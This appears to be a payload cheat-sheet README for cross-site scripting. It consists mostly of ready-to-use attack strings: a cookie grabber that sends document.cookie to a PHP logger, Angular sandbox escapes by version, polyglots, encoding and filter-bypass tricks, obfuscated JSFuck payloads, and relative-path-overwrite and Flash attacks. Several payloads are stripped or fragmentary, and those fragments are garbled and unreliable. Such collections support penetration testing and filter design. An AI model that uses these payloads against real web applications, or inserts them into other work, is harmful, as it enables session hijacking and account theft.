# Cross Site Scripting Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. ## Exploit code or POC Cookie grabber for XSS ``` document.location='http://localhost/XSS/grabber.php?c=' + document.cookie // Write the cookie in a file $cookie = $_GET['c']; $fp = fopen('cookies.txt', 'a+'); fwrite($fp, 'Cookie:' .$cookie.'\r\n'); fclose($fp); ?> ``` ## XSS in HTML/Applications XSS Basic ``` Basic payload ipt>alert('XSS')ipt> "> "> Img payload xss "> "> Svg payload "> "> With an additional URL ``` XSS in flash application ``` \%22})))}catch(e){alert(document.domain);}// "]);}catch(e){}if(!self.a)self.a=!alert(document.domain);// "a")(({type:"ready"}));}catch(e){alert(1)}// ``` XSS in Hidden input ``` Use CTRL+SHIFT+X to trigger the onclick event ``` DOM XSS ``` #"> ``` ## XSS in wrappers javascript and data URI XSS with javascript: ``` javascript:prompt(1) %26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341 javascript:confirm(1) We can encode the "javacript:" in Hex/Octal \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1) \152\141\166\141\163\143\162\151\160\164\072alert(1) We can use a 'newline character' java%0ascript:alert(1) - LF (\n) java%09script:alert(1) - Horizontal tab (\t) java%0dscript:alert(1) - CR (\r) Using the escape character \j\av\a\s\cr\i\pt\:\a\l\ert\(1\) Using the newline and a comment // javascript://%0Aalert(1) javascript://anything%0D%0A%0D%0Awindow.alert(1) ``` XSS with data: ``` data:text/html, data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ ``` XSS with vbscript: only IE ``` vbscript:msgbox("XSS") ``` ## XSS in files XSS in XML ``` alert(1) ``` XSS in SVG ``` ``` XSS in SVG (short) ``` ``` XSS in SWF ``` Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); InsecureFlashFile.swf location to url: InsecureFlashFile.swf?a=location&c=http://www.google.com/ open url to new window: InsecureFlashFile.swf?a=open&c=http://www.google.com/ http request to url: InsecureFlashFile.swf?a=get&c=http://www.google.com/ eval js codz: InsecureFlashFile.swf?a=eval&c=alert(document.domain) ``` more payloads in ./files ## XSS with Relative Path Overwrite - IE 8/9 and lower You need these 3 components ``` 1) stored XSS that allows CSS injection. : {}*{xss:expression(open(alert(1)))} 2) URL Rewriting. 3) Relative addressing to CSS style sheet : ../style.css ``` A little example ``` http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE] Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))} ``` Explanation of the vulnerability ``` The Meta element forces IE’s document mode into IE7 compat which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert. A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works. Demo 1 at http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php Demo 2 at http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3 MultiBrowser : http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php From : http://www.thespanner.co.uk/2014/03/21/rpo/ ``` ## Mutated XSS for Browser IE8/IE9 ``` <img src=1 onerror=alert(1)> ``` IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute. ## XSS in Angular Angular 1.6.0 ``` {{0[a='constructor'][a]('alert(1)')()}} ``` Angular 1.5.9 ``` {{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }} ``` Angular 1.5.0 - 1.5.8 ``` {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}} ``` Angular 1.4.0 - 1.4.9 ``` {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}} ``` Angular 1.3.20 ``` {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}} ``` Angular 1.3.19 ``` {{ 'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join; $eval('x=alert(1)//'); }} ``` Angular 1.3.3 - 1.3.18 ``` {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 'a'.constructor.prototype.charAt=[].join; $eval('x=alert(1)//'); }} ``` Angular 1.3.1 - 1.3.2 ``` {{ {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 'a'.constructor.prototype.charAt=''.valueOf; $eval('x=alert(1)//'); }} ``` Angular 1.3.0 ``` {{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )) );}} ``` Angular 1.2.24 - 1.2.29 ``` {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}} ``` Angular 1.2.19 - 1.2.23 ``` {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}} ``` Angular 1.2.6 - 1.2.18 ``` {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}} ``` Angular 1.2.2 - 1.2.5 ``` {{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}} ``` Angular 1.2.0 - 1.2.1 ``` {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}} ``` Angular 1.0.1 - 1.1.5 ``` {{constructor.constructor('alert(1)')()}} ``` ## Polyglot XSS Polyglot XSS - 0xsobky ``` jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e ``` Polyglot XSS - Ashar Javed ``` ">>" ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> ``` Polyglot XSS - Mathias Karlsson ``` " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// ``` Polyglot XSS - Rsnake ``` ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> ``` ## Filter Bypass and exotic payloads Bypass case sensitive ``` <sCrIpt>alert(1)</ScRipt> ``` Bypass quotes for string ``` String.fromCharCode(88,83,83) ``` Bypass quotes in script tag ``` http://localhost/bla.php?test=</script><script>alert(1)</script> <html> <script> <?php echo 'foo="text '.$_GET['test'].'";';`?> </script> </html> ``` Bypass quotes in mousedown event ``` <a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a> You can bypass a single quote with &#39; in an on mousedown event handler ``` Bypass dot filter ``` <script>window['alert'](document['domain'])<script> ``` Bypass parenthesis for string - Firefox ``` alert`1` ``` Bypass onxxxx= blacklist ``` <object onafterscriptexecute=confirm(0)> <object onbeforescriptexecute=confirm(0)> ``` Bypass onxxx= filter with a null byte/vertical tab - IE/Safari ``` <img src='1' onerror\x00=alert(0) /> <img src='1' onerror\x0b=alert(0) /> ``` Bypass onxxx= filter with a '/' - IE/Firefox/Chrome/Safari ``` <img src='1' onerror/=alert(0) /> ``` Bypass space filter with "/" - IE/Firefox/Chrome/Safari ``` <img/src='1'/onerror=alert(0)> ``` Bypass with incomplete html tag - IE/Firefox/Chrome/Safari ``` <img src='1' onerror='alert(0)' < ``` Bypass using javascript inside a string ``` <script> foo="text </script><script>alert(1)</script>"; </script> ``` Bypass using an alternate way to execute an alert ``` <script>window['alert'](0)</script> <script>parent['alert'](1)</script> <script>self['alert'](2)</script> <script>top['alert'](3)</script> ``` Bypass using an alternate way to trigger an alert ``` var i = document.createElement("iframe"); i.onload = function(){ i.contentWindow.alert(1); } document.appendChild(i); // Bypassed security XSSObject.proxy = function (obj, name, report_function_name, exec_original) { var proxy = obj[name]; obj[name] = function () { if (exec_original) { return proxy.apply(this, arguments); } }; XSSObject.lockdown(obj, name); }; XSSObject.proxy(window, 'alert', 'window.alert', false); ``` Bypass ';' using another character ``` 'te' * alert('*') * 'xt'; 'te' / alert('/') / 'xt'; 'te' % alert('%') % 'xt'; 'te' - alert('-') - 'xt'; 'te' + alert('+') + 'xt'; 'te' ^ alert('^') ^ 'xt'; 'te' > alert('>') > 'xt'; 'te' < alert('<') < 'xt'; 'te' == alert('==') == 'xt'; 'te' & alert('&') & 'xt'; 'te' , alert(',') , 'xt'; 'te' | alert('|') | 'xt'; 'te' ? alert('ifelsesh') : 'xt'; 'te' in alert('in') in 'xt'; 'te' instanceof alert('instanceof') instanceof 'xt'; ``` Bypass using Unicode ``` Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was transformed into U+003C LESS­THAN SIGN (<) Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (") Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (') Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was transformed into U+003C LESS­THAN SIGN (<) Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (") Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (') E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/ %EF%BC%9E becomes > %EF%BC%9C becomes < ``` Bypass using unicode converted to uppercase ``` İ (%c4%b0).toLowerCase() => i ı (%c4%b1).toUpperCase() => I ſ (%c5%bf) .toUpperCase() => S K (%E2%84%AA).toLowerCase() => k <ſvg onload=... > become <SVG ONLOAD=...> <ıframe id=x onload=>.toUpperCase() become <IFRAME ID=X ONLOAD=> ``` Bypass using overlong UTF-8 ``` < = %C0%BC = %E0%80%BC = %F0%80%80%BC > = %C0%BE = %E0%80%BE = %F0%80%80%BE ' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7 " = %C0%A2 = %E0%80%A2 = %F0%80%80%A2 " = %CA%BA ' = %CA%B9 ``` Bypass using UTF-7 ``` +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4- ``` Bypass using weird encoding or native interpretation to hide the payload (alert()) ```javascript <script>\u0061\u006C\u0065\u0072\u0074(1)</script> <img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" /> <iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe> <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script> <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script> ``` Exotic payloads ``` <img src=1 alt=al lang=ert onerror=top[alt+lang](0)> <script>$=1,alert($)</script> <script ~~~>confirm(1)</script ~~~> <script>$=1,\u0061lert($)</script> <</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script> <</script/script><script ~~~>\u0061lert(1)</script ~~~> </style></scRipt><scRipt>alert(1)</scRipt> <img/id="alert&lpar;&#x27;XSS&#x27;&#x29;\"/alt=\"/\"src=\"/\"onerror=eval(id&#x29;> <img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)> <svg><x><script>alert&#40;&#39;1&#39;&#41</x> <iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'> ``` ## Thanks to * https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot * tbm * http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html * http://www.thespanner.co.uk/2014/03/21/rpo/ * http://blog.innerht.ml/rpo-gadgets/ * http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite * http://d3adend.org/xss/ghettoBypass * http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html